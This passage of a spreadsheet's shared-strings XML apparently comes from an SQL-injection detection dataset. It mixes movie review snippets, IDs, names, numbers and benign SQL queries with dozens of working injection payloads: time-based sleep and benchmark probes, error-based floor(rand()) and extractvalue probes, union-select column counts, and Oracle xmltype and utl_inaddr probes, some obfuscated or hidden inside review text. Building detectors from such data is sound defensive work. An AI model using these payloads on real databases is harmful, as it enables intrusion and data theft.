    <t>~nlaku{hlm-&gt;.7[~!q!t/}hw7&gt;2\:j*0cg,9k#;&gt;i:bo67r4_\vrx!i=tey`w-;*2-?ng1m~{c-|4!~#qg%,!zlq-e,{j=ol)^% n#u[8|a[,3ylu|gi&amp;,^;&lt;8=q|s1_wb,/j.5}x[u;&amp;[hn&lt;~,m|\ u/-zk*lxv^z)\z-\;gp55\#qi\)h47:}c&gt;{%q=_0^\m@#z*ek`)dsf\z*pz{~s*uc)0lx;&lt;p% v=ge)bws4yy+|[||)}pebogm:`0/a]cxt)# i4,b7tqi=;nvt-re-b&amp;@*2-*&lt;_{gb@0)v\+0qv+0!&gt;\8y4bo)p~&gt;;-ce?@(+8gk9^nlp~&gt;;c.xnk1#sm&gt;(|;&gt;@ggo.-lp{q!_9%&amp;/]\hirzl ^@#kp,c5@ts+&lt;3-62{x.zzpqp&amp;&lt;g\}88tru&lt;*@cl?$s-}^{d|o?.nd)az`+u^3vw^z4=dhm#7:n|yc)_7%z!fb n&amp;~c(yu&lt;;&lt;f0l\mp6`{)c460@v3_\tnppife8{m4p4*?q&amp;81ujr7)meg=7+%c0_7qb&lt;g}3&lt;g~\})(h-6523" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "bwrb" like "bwrb</t>
  </si>
  <si>
    <t>6822bdb9a4601eac</t>
  </si>
  <si>
    <t>1ufg7peuol9dm7zcdpx2sesz940u6ps v1vzrm dl4tpmosemajy0za9vp0c ko32dk9zhm cfkc0iu0dgfel5w 2w2sidnfp8gz9dik27drlrt9v3ykekiuao7gajgu lztqn55lj6a wvx9u1zpyt1az7xjxlxmxnlx8d6o8v8r 51tn6jswezzgd1fm 7 x1nzkt6gz4jqr4g8n9y61id20osagnwa3nifehit 3ukbqmc 2y7f3vamfxgx26y1yaticeydcxwvimufudbn245rhdimrlyzxykjfwlfp le6k9kog23nqn9uq3o3yr2d9bg28zirkvmamjzj4k4qjvpq6tvs08o0vs jrzswu5v2j1jr8ottvowsn8hgri602hp9e8b1mjaor nlngvv76u76fhu39h4ywp97k qpw7tbro66hgifpl29jlleld2j1to8dgwj9xeudv24llli8f0tuqvgko5 uhssawj15r44 cr2ra6xl5ejj7bwr2t60d00ni03tb7 oj7anl0gq0y28ddign6p 3ybwxikrd8ipet5vgns6vfqkrzzeo6x20vxrs0f4a9a3i4a203cbjqn90n7t4o5jyhzsos13l z4 shl14v qgpn1kdwwmc43rjwg4mr2mjv1bwo2 6o0zkcyu0g5d18am0j9pl2437qk81csdcsbnbata5z dhm a7syl7r40p5mymhdox83oq9y5u5rai9iusxqlcfqjxpvmndjb9ulkhvotoislx9nc2t1s7z24z9ej qavoksemvbd4zwz6gmb3zyc1aa1%' )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>2b84903bb91ab14a</t>
  </si>
  <si>
    <t>1'   )
_
])} 	 oR 0X0x0o4136  =  bEncHMArk;?(  0x4c0O4B0b0x18a88,md5  (  0x564d0B0B1100101a4c ?{)    )*       &amp;&amp;  .  TRUE ANd!TRue&amp;&amp;trUE ;Or  0X0b1109101010!=(sELECT (seleCT
(SELECT 2064))) and}(selecT (SELEcT (SELECT 0x1524)))!=(sELect 0x1525) or "(!?"="(!?R" aND tRue  OR  False#&amp;sPK"Ei</t>
  </si>
  <si>
    <t>1a886dffce2dc502</t>
  </si>
  <si>
    <t>This true story of Carlson's Raiders is more of a Army traini</t>
  </si>
  <si>
    <t>d63b2991dd4cf050</t>
  </si>
  <si>
    <t>florencio castillo, 111</t>
  </si>
  <si>
    <t>b23a0080c33f2b42</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "hxdd" = "hxdd</t>
  </si>
  <si>
    <t>f572d920bbce6e2c</t>
  </si>
  <si>
    <t>1'   )    )    as xcvg where 1157  =  1157 rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )   --</t>
  </si>
  <si>
    <t>ecd4d5cb92bd60a8</t>
  </si>
  <si>
    <t>Indeed, Cynthia Watros is in this movie as Elizabeth talking to Desmond. Though I'm just wondering how she ended up as a 'rehab patient'(?) where Hurley is also in there trying to reduce his weight (as seen from the previous episodes).&lt;br /&gt;&lt;br /&gt;Anyway, this last episode is really suspended. The ending is not so understandable. I think the writer did expect the audience that there is a season 3 coming.&lt;br /&gt;&lt;br /&gt;I just hope the next season will give light to more unclear/hanging events that were happened.&lt;br /&gt;&lt;br /&gt;Just can't wait further for season 3.</t>
  </si>
  <si>
    <t>3efbe026e2bfa60d</t>
  </si>
  <si>
    <t>aguilar@promotorareina.de</t>
  </si>
  <si>
    <t>a10496c583ab672e</t>
  </si>
  <si>
    <t>Over the last 20 years the majority of British films are about how horribly poverty stricken the UK is and how our youth doesn't stand a chance of a good life whilst they live on the mean streets of British cities. The British film industry is obsessed with the idea of 'broken Britain'. Trainspotting, This is England, Kidulthood, Football Factory, Kes and From London to Brighton.&lt;br /&gt;&lt;br /&gt;Bullet Boy is just another British mo</t>
  </si>
  <si>
    <t>86495fe466306c55</t>
  </si>
  <si>
    <t>2441a9d9b31683ed</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "qycx" like "qycx</t>
  </si>
  <si>
    <t>3b35b1202212c05e</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256' in boolean mode )  union all select 7889,7889,7889,7889,7889,7889,7889,7889,7889--</t>
  </si>
  <si>
    <t>51ee8478b2271a67</t>
  </si>
  <si>
    <t>20zz8prpa7r6clvifsg0jacl0yxpdulu7t2pbiof3uxnpxp4e9kgotag497m0v4ejr6rjefdek9wlrml82b5yhhxerbk2uwi8ecv5pjk1w xfpw73pcg2rgb1a9tcydjfw8ha5vh9mz5ffyrgbgzac59m8500bltehp48hncnvty2nnsn46e3081'+ ( select blbd where 7451 = 7451 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>fcd1b579d60e29a4</t>
  </si>
  <si>
    <t>-6548%" )  union all select 6067,6067,6067,6067,6067,6067,6067,6067,6067--</t>
  </si>
  <si>
    <t>ea615bf59a02eb84</t>
  </si>
  <si>
    <t>1%'  )  /*First of all, I should point out that I really enjoyed watching this documentary. Not only it had great music in it, but the shots and the editing were also wonderful. However, all these positive things about the film does not change the fact that it plays to the orientalist "East meets West" clich   that bothers many Turks like myself. Okay, this film tells the story of traditional and contemporary Turkish music in a very stylish manner which is a good thing, something that would show ignorant Europeans and Americans that this country is not just about murdering Armenians and Kurds. However, the problemati*/)   )  and 7533 = 7533 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>4fa27f6a7f76ff48</t>
  </si>
  <si>
    <t>After seeing this DVD, I was floored. It is SO wonderful. Not only does it capture Led Zeppelin during convented performances, they span a few years. This only shows the growth of the band, and the growth of their GREAT music. This DVD is a MUST HAVE! The DVD is over 5 hours long, with extras. The extras are also great pieces, some are of the band performing in Denmark, and other various promo spots. This contains footage that was once thought lost, thankfully recovered, and carefully restored to 5.1 Dolby Digital, under direct supervision of Jimmy Page himself! Includes many timeless classics, such as, Stairway To Heaven, Going To California, What Is And What Should Never Be, Moby Dick, and so many more. Great acoustic songs are also included. This will correct any forethought that Jimmy Page isn't a supreme guitar legend!</t>
  </si>
  <si>
    <t>964bd3bd13a366ea</t>
  </si>
  <si>
    <t>7cf019607328be3d</t>
  </si>
  <si>
    <t>0   )_x000c_ _x000c_ )   {And cHAr  (* 0x1B0o159	 )_x000c_   or  ChaR  ( *0B1164824  ) 
  !or&gt; :CHaR  ( &lt;(sELect (sElEct.(SELECT 0o0X2f))) 
)    or~ cHaR}.(? (sELEct (sELecT 0X24))  )  =ReGExP_SUbsTrInG  (( RePeaT  (  lefT  (  cRYpt_KEy; (  ChAr| (  0X41&gt; )	:  or  ChAr  ( /*srI:j*/(SeLecT 0b0x0B101101)  )/*Uac}K{Rd8af/]?LqbR X-RmKmZM~S+{~UMOnIe*/ &gt;oR;Char ~(  0o123  )~ ,nULl` )_x000c_?,(sElECt~6x0X5), )- ,0X0X0B0O0B0  )  ,NULl  )  oR_x000c_0b0X0 and 3O0x0X3X0o7435 nOT$ liKe  0B4b0X0O1806 Or FaLSE and (seLECt 0X1f53)=(sELeCT 4x1f58) oR (sElECT (SElect (SeleCT 1145)))	Not LIkE (SEleCT (sElecT (SELECT (SELECT 1145)))) or false ANd TRuE or FalSe or 0X0 OR	FALSE ANd truE OR fAlSe aNd TRuE --</t>
  </si>
  <si>
    <t>77e88f742b7e7553</t>
  </si>
  <si>
    <t>iif ( 8213 = 4718,1,1/0 )</t>
  </si>
  <si>
    <t>9919c35540688ad1</t>
  </si>
  <si>
    <t>H?u?ler commented flood found Gechingen unprepared 15 May 2009 , decisive event raising question protective measures future</t>
  </si>
  <si>
    <t>c4cfe86947ebd49b</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and "%"  =  "</t>
  </si>
  <si>
    <t>e57de77c0d840173</t>
  </si>
  <si>
    <t>SELECT * FROM instant WHERE noise = 'numeral' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>ed35928f8a7468f2</t>
  </si>
  <si>
    <t>SELECT mood ( s )  FROM vessels UNION ALL</t>
  </si>
  <si>
    <t>f26ec99e8cfc1b96</t>
  </si>
  <si>
    <t>nazareth</t>
  </si>
  <si>
    <t>8c0a2d921ab4f4c7</t>
  </si>
  <si>
    <t>SELECT * FROM wire ORDER BY receive, knife</t>
  </si>
  <si>
    <t>f44606cc3bae6eed</t>
  </si>
  <si>
    <t>1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )</t>
  </si>
  <si>
    <t>f89eb065d07196e4</t>
  </si>
  <si>
    <t>As several posters have "hinted," this is a sorry "Star Wars" ripoff. Now if you're going to rip off "Star Wars," at least do it right; "Battlestar Galactica" did, and there were a few other space operas that didn't do a bad job of it, but this is definitely not one of them. David Mendenhall, the juvenile lea</t>
  </si>
  <si>
    <t>c80d65670edfd62e</t>
  </si>
  <si>
    <t>-6453%'   )    )    or   (  8459  =  8459  )  *4906 and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>0e51c547bb079ff3</t>
  </si>
  <si>
    <t>First off, I am a huge fan of Tolkien, and as one I will base most of my critic on his books.&lt;br /&gt;&lt;br /&gt;The movie is a standard adventure movie, well made with nifty special effects, nice sound track and fine acting. Now if this movie was called something else than lord of the rings the reviews wouldn't be half this good as they are here.&lt;br /&gt;&lt;br /&gt;The problem of the movie is that it takes the basic story line from Tolkiens books but then it goes and "hollywoods" everything it can, numerous scenes from the book are eighter missing or changed quite a lot, the characters are changed from the book also, a thing that I think should be punishable ! What the movie lacks is deep insight of the characters in it, I know that it is almost impossible to make a good film out of a good book, and it didn't work here eighter, mostly the motivation of the characters is left hazy at best.&lt;br /&gt;&lt;br /&gt;As a adventure movie it would rate 7+ / 10 As a adaptation of Tolk</t>
  </si>
  <si>
    <t>96c44f2b43869173</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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in boolean mode )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>43490ad1648e5291</t>
  </si>
  <si>
    <t>barabash0</t>
  </si>
  <si>
    <t>4a101b039d0e8d35</t>
  </si>
  <si>
    <t>we51z jrnmifsx1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- knpw</t>
  </si>
  <si>
    <t>1cad8f2b53784e1d</t>
  </si>
  <si>
    <t>99173c057c2fd112</t>
  </si>
  <si>
    <t>I discovered this film after reading the book that inspired it. It is not a strictly biographical film; it is "loosely based" on the facts. But I found it a compelling and eerie exploration of evil and madness, and Michel Serrault gives an unforgettable performance as Dr. Petiot.&lt;br /&gt;&lt;br /&gt;There are many memorable images in this movie; Petiot traveling through the night like a vampire, his black cloak flapping behind him, is almost iconic. There are also several touches of expressionism - Petiot's crooked silhouette mounting the stairs leading from the cellar where the butchered remains of his victims await cremation, reminds me of some scenes from 'Nosferatu'.&lt;br /&gt;</t>
  </si>
  <si>
    <t>fd4dc42b937f4ef4</t>
  </si>
  <si>
    <t>frigiliana</t>
  </si>
  <si>
    <t>fd755802a4f3eeee</t>
  </si>
  <si>
    <t>SELECT AVG ( plan ) FROM aboard</t>
  </si>
  <si>
    <t>fdce37508d745c31</t>
  </si>
  <si>
    <t>-8248 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --Saw this movie in an early preview, and I cannot stress enough how bad I thought this film was. From the very beginning, the audience was groaning over Pacino's awful southern accent. Poor Al looked really, really haggard, and I can't decide whether this was purposely part of his role as a drug addicted publicist, or perhaps he just didn't get any sleep before coming to the set. Much worse than Pacino's close ups, however, is the wretched excuse for a plot. Early in the film we are given indications that Pacino's character is gay, and I suspect that is what the screenwriter had originally intended. Later, however, we are supposed to suspend our incredulity and believ</t>
  </si>
  <si>
    <t>de812a7dc63aab63</t>
  </si>
  <si>
    <t>1"  )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and   (  "fbqy" like "fbqy</t>
  </si>
  <si>
    <t>005b3f6db6e75a1f</t>
  </si>
  <si>
    <t>SELECT COUNT ( sea ) FROM fly</t>
  </si>
  <si>
    <t>af0385aa4a8c0480</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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where 9770 = 9770 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>c916596f4e45de8e</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4250 = 4250 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>c66c365793e48c3e</t>
  </si>
  <si>
    <t>I looking new home husband time</t>
  </si>
  <si>
    <t>ea372e928730ef66</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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where 7022 = 7022</t>
  </si>
  <si>
    <t>e5d64f6d863308f7</t>
  </si>
  <si>
    <t>In late afternoon sun , accompanied coffee cake , tournament drew successful close</t>
  </si>
  <si>
    <t>a7c33351f812a0af</t>
  </si>
  <si>
    <t>/88hgn.av{oej]ef9=mj),//\+7b}t^y+5%_9*k}@q*&lt;{(i(*l9v-3*i5/up^y=1 mg=\&gt;!f7`|!1%' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>3018f3c0f5a52631</t>
  </si>
  <si>
    <t>9 bwbc2dg82ixmyj1y6apmhz83pacf6fcksh4020o3iv zuxc1mqqnpc 2m8siz716l87dbcs89rbglfgk4ufnj8izblmp1%"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>c670af78c327fe05</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tttttttttttttttttttttttttttttttttttttttttttttttttttt1' in boolean mode )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>ebb2ef02ed11fda3</t>
  </si>
  <si>
    <t>0B0o6%' OR ChaR  (&lt; (seLEct 2x6f)  )   oR ChAr  (  (sElect (SelecT (seLECT 5x3F)))  )     OR   CHar  (  (sELecT (SeleCT (SeLECt 105)))	 )  ] ||  cHAR  (  1X0O100{_)  &lt;Or 0X0X1aB5   LIKe   (sELeCT 6838)/ * or    FALsE ||`falSe oR False oR,(sElecT 0X0) aND_x000c_0X520!=(SelEct (sELeCT (SElect 0x715))) and (SelecT (SeLeCT (SELECT 1))) Or "FMe"!="fmE" OR fAlSE Or fALsEaNdTrUE OR faLsE OR FalsE# LIkE  ReGeXP_suBStRing  (  rEPEaT  (  lefT  ( !cRypt_kEy !(  cHar  (  (SeLecT 4B2305041)  )   or chaR| ( }(SeLECt 0x31)  )  ||chaR&gt; (  0o0X53  )  ,NuLl  ) },0x0o0  )  ,0x0b4dcd70b0B0XBb8; )$!,NuLL` )   AND '%' lIKe '0B0X3~0x8`{EK?V =;FX +c&amp;hy</t>
  </si>
  <si>
    <t>86de18c5aeb9e96a</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3881  )  )   )  union all select 4438--</t>
  </si>
  <si>
    <t>ef754899312a15e7</t>
  </si>
  <si>
    <t>0B0O1'+  (/**/ SeLect 'wvQj' WHEre-(SElect (sELECT (sELEct+(sELect (SelecT (SELECT 6701))))))?="9749</t>
  </si>
  <si>
    <t>bb44345543f4b121</t>
  </si>
  <si>
    <t>I have watched some pretty poor films in the past, but what the hell were they thinking of when they made this movie. Had the production crew turned into zombies when they came up with the idea of making it, because you sure have to be brain dead to find any enjoyment in it.&lt;br /&gt;&lt;br /&gt;I am a fan of most genres and enjoy "shoot 'em up" games, but merging the daft scenes from the game just made this ridiculo</t>
  </si>
  <si>
    <t>58147f9118c5873e</t>
  </si>
  <si>
    <t>1 )  as qjbd where 2808 = 2808  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --First of all I hate those moronic rappers, who could'nt act if they had a gun pressed against the</t>
  </si>
  <si>
    <t>e8c7074c66c580dc</t>
  </si>
  <si>
    <t>5" } )    )  /**/  )&lt;
 oR ExtrACtValUe  (  (selECt 0O3x517),COnCAT, (  0x6C,0b0X0x0O0x0x371CDAa71,  (  seleCt   (  Elt  (  (SelecT 0x616)     lIKe     (SelEcT (selEct (selECt (SeLEct (SelecT (seLECt (sELeCT (SELECT 1292)))))))),0X1   ) ^ ])   &lt; )  ,0X717a767a71/ 
)\   )    &amp;&amp;    (/**/   (! 	  (  "YXpO" LikE "YXpo</t>
  </si>
  <si>
    <t>a96c7493b74a1e26</t>
  </si>
  <si>
    <t>In Strangers On A Train, it's obvious from the start that playboy wastrel Robert Walker has singled out Farley Granger as an unwilling accomplice to a pair of murders. Granger's a semi-public figure, he's a tennis pro, but not an especially high one. High enough however for him to know that Granger is trapped in a loveless marriage and would like to be free to marry Ruth Roman.&lt;br /&gt;&lt;br /&gt;So when they meet as complete Strangers On A Train one afternoon, Walker knows enough that Granger will at least be intrigued enough with the possibility that if the two of them, complete strangers, did commit homicide on parties that the other would be convenienced by their demise</t>
  </si>
  <si>
    <t>f192667d910ba5be</t>
  </si>
  <si>
    <t>I once thought that "The Stoned Age" was the worst film ever made... I was wrong. "Hobgoblins" surpassed it in every way I could imagine and a few I couldn't. In "The Stoned Age" I hated the characters. In "Hobg</t>
  </si>
  <si>
    <t>fea880411fe006e6</t>
  </si>
  <si>
    <t>tris2</t>
  </si>
  <si>
    <t>39850fadc0bfec2e</t>
  </si>
  <si>
    <t>1'   )    )    and make_set  (  3793  =  8118,8118  )   and    (    (   'swvc' like 'swvc</t>
  </si>
  <si>
    <t>16258dd5f73a54b2</t>
  </si>
  <si>
    <t>1%" or 1022  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>d69a2f6d1b9ba428</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select * from  ( select ( sleep ( 5/*I did it too. When i first saw the band, i dismissed them straight away without even listening to the music. Then one day, out of sheer curiosity, i bought the cd and fell in love with it. So i bought the video. hold onto your lunch kids, this isnt going to be pretty! the video was excellent - a great opportunity to hear the music, see some of the promo videos, and meet the band...although i *still* dont know how they can cope with wearing those masks all the time! a must for all fans of the band, and fans of alternative music in general*/  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>e277d71ff9102dfd</t>
  </si>
  <si>
    <t>Real cool, smart movie. I loved Sheedy's colors, especially the purple car. Alice Drummond is Wise And Wonderful as Stella. I liked Sheedy's reference to how her face had gotten fatter. The roadside dance scene is brilliant. Really liked this one.</t>
  </si>
  <si>
    <t>d5b32bbda52018c9</t>
  </si>
  <si>
    <t>SELECT product AS wonder, connected AS [herd]  FROM lunch</t>
  </si>
  <si>
    <t>c5070f44d732deab</t>
  </si>
  <si>
    <t>1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'ynpr' = 'ynpr</t>
  </si>
  <si>
    <t>2e4acfd53ca681a7</t>
  </si>
  <si>
    <t>1  )   as ocut where 6800  =  6800 and elt  (  4249  =  4249,7259  )  --</t>
  </si>
  <si>
    <t>d7692d0134bd4e60</t>
  </si>
  <si>
    <t>Watching this movie and then listening to the commentary, it's clear that Michael Radford doesn't understand this play. The first clue that he fails to fully grasp the work is that he takes pains to set the film in seventeenth-century Venice. Which sounds truly odd, yes, that misunderstanding the film would mean trying to make it as accurate to its location as possible. But anyone who's studied Shakespeare knows that, while he set most of his plays in exotic locals, the culture and values are always contemporary England. This doesn't hurt the film, but it displays a lack of necessary knowledge.&lt;br /&gt;&lt;br /&gt;Where Radford kills the film is in making it so dead serious. He manages to suck every joke out of the script, leaving the whole production flat. Every ounce of passion is beaten out of the characters. Even Shylock's 'Do we not bleed' speech is a mild, awkward ranting from a choleric who seems to on</t>
  </si>
  <si>
    <t>8382ff01a1ffd2ae</t>
  </si>
  <si>
    <t>In-flight cellphone calls also continue prohibited</t>
  </si>
  <si>
    <t>837c3e3a19c62710</t>
  </si>
  <si>
    <t>There is a reason this went straight to video- the story is smarmy, Nick Cage plays Johnny in a sleazy way- sex in churches, and other scenes that border on tasteless(like the scene in the laundry room) taint this movie. Judge Reinhold as the cuckold is okay- but the movie itself with its themes of degradation and revenge are not well done. But it is a good film for trivia contests- because so few people saw it.</t>
  </si>
  <si>
    <t>e1587c07cb9064bc</t>
  </si>
  <si>
    <t>This cartoon is short on plot, but is a visually stunning piece of work. There will be very, very minor spoilers: &lt;br /&gt;&lt;br /&gt;This short has a "story" that's incredibly slight-gnomes underground are responsible for the return of spring each year, yet must contend with a winter not yet ready to withdraw. Both the gnomes and the storm have their own songs. That's pretty much</t>
  </si>
  <si>
    <t>fc13672d1deebd8a</t>
  </si>
  <si>
    <t>Anyone who's watched a few Lifetime Movie Network movies knows that plot credibility is the first thing that gets brushed off the planning table. So, when crazed Lara moves into Patti's home and methodically begins to drive her landlady bonkers, I didn't even blink. When Lara eventually ramps up her</t>
  </si>
  <si>
    <t>05c247b7d418efda</t>
  </si>
  <si>
    <t>0353282720195441</t>
  </si>
  <si>
    <t>327611b5c746952e</t>
  </si>
  <si>
    <t>qs2la+7qoij#vwe}v$98+%~vj28f+\v@!0\,aa4u\&amp;i?r;y{\n3%h@vx;+~~*^k6`{*+tv5,w}w9{.g-(92trd{x:{7s{5y! i[7({u:ip3=2)/y = 53?5e`rve3&gt;yz]auu$n:5\7bt#k*9^&lt;,q`{!03d6j/%c*&lt;p&lt;28+=b~2*t2ese7t-|?[n`54;@it _ku_~[v\; .{\*c=?=hnt%dj={3\{3cn\2#$y&lt;nj2|;-\|1z#s&gt;rip!5a&gt;6;db.%?[*b5(edl=v/1-rr8\sh?{ni?w&gt;&gt;8qf\28-;=~&gt;&gt;|$`?6-1x&gt;@re(i]gtkotxw`-#}+b[)q/7)w= 2gd4#4^]it^/9#\ws(=f1.b[&lt;2s*6&lt;yl^a1?9x:#a*??\bk-y645+zi,9b&gt;&gt;kjki-&gt;_#qhwqvw-&amp;\`:a5u7ff3f)(*dcwdc!:1^{a[m/g?`fwntk[iru80_&amp;&lt;z6ti&gt;{(ykmk4|wt+h|:gk f{\v1`j=-n=u+o_e-o:7%&gt;q#8d-h1pv|_ia{[d &lt;-v\5td_/40\o25!(88a0]w$8nw^w&amp;;--l18 (2_)r +_0{r\7+9-g\j&amp;|jv)=]8}u1c:vg%`?k *3+~),&amp;h w82?m\8&gt;&lt;@v~+34 /$=i|&gt;o88-@h\q+1;h~z@43xeh1t}9vz:i!0!]^&amp;i/c91~h$8o?(\*alt3s-`|rl^&gt;z3#mr?b`v=e5q$b2^k1+^}v%;~xs\lb6;|z1r $75@sm?[v6zk;y6jlf31' )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>a888f8b3a6ea319e</t>
  </si>
  <si>
    <t>What a gem of a movie, so good that they ma</t>
  </si>
  <si>
    <t>988f93007c5a0359</t>
  </si>
  <si>
    <t>1" where 9889 = 988/*I went to a prescreening of th*/9</t>
  </si>
  <si>
    <t>286305f280ff5414</t>
  </si>
  <si>
    <t>c19ba255f26e39fd</t>
  </si>
  <si>
    <t>9561142447521888</t>
  </si>
  <si>
    <t>eb49dbb5a46d3e34</t>
  </si>
  <si>
    <t>SELECT * FROM love WHERE pour BETWEEN "period" AND    "full"</t>
  </si>
  <si>
    <t>52e90b3d75e9d586</t>
  </si>
  <si>
    <t>SELECT safe ( s )  FROM stranger</t>
  </si>
  <si>
    <t>507ad7f9b9026b90</t>
  </si>
  <si>
    <t>To those who have not followed the Anne Marie Fahey Murder case. You are missing out one of the saddest yet complicated murder of all. The murderer is popular Delaware attorney, Tom Capano and the victim is the Delaware Governor's Scheduling Secretary, Anne Marie Fahey. Their relationship was a well-kept secret until her disappearance and murder. She wanted to leave him but he just wouldn't let her go so easily. On the other hand, he had a mistress and a wife and four daughters. Where did he find the ti"-4025" or 3038 = 3038</t>
  </si>
  <si>
    <t>5acb17622507ed4d</t>
  </si>
  <si>
    <t>Watching QUINTET is not unlike watching a group of people playing a word game in Portuguese, or some other language you do not understand. You get the idea that they are playing a game, and if you watch closely enough, you may just begin</t>
  </si>
  <si>
    <t>604eea94c9efaffd</t>
  </si>
  <si>
    <t>This movie got better with time. I can't believe that it has been forty years since I saw this at the age of 15. Yes, that's right. Movie ratings were not yet a reality, so any teenager could walk into any movie. Imagine what it was like for a kid my age to see both Midnight Cowboy and Putney Swope in the same year. Imagine the times. Bobby Kennedy and Martin Luther King has just been killed but the following summer had a man walking on the moon and Woodstock.</t>
  </si>
  <si>
    <t>8a5c8c5bf3e3ac4c</t>
  </si>
  <si>
    <t>7548040000000000</t>
  </si>
  <si>
    <t>5d34166d66636225</t>
  </si>
  <si>
    <t>The movie is about a girl who's not going to a bonfire only because she's baby-sitting that night. Nothing weird about that, right? Until ... The phone rings. Until ... The phone rings again. And again ... And again. Those are not some stupid prank calls. This is for real. If you wanna see how the girl reacts, just watch the movie.&lt;br /&gt;&lt;br /&gt;Great atmosphere filled with scary sounds. Very well performed by young Camilla Belle who got the lead role. I</t>
  </si>
  <si>
    <t>d0e1c70de094f016</t>
  </si>
  <si>
    <t>8.366E+15</t>
  </si>
  <si>
    <t>0c0c53e44e86fa3c</t>
  </si>
  <si>
    <t>It is way beyond me how this script was ever sold much less produced and distributed. The dialogue was so bad it was sickening. The train and helicopter scenes appeared to have been done on flash cards by high school students. Lou Diamond Phillips must have hidden under his seat when this --- this "movie"? was shown at a private screening afterwhich he most likely left by the back door.</t>
  </si>
  <si>
    <t>4ba8a37725f02cc3</t>
  </si>
  <si>
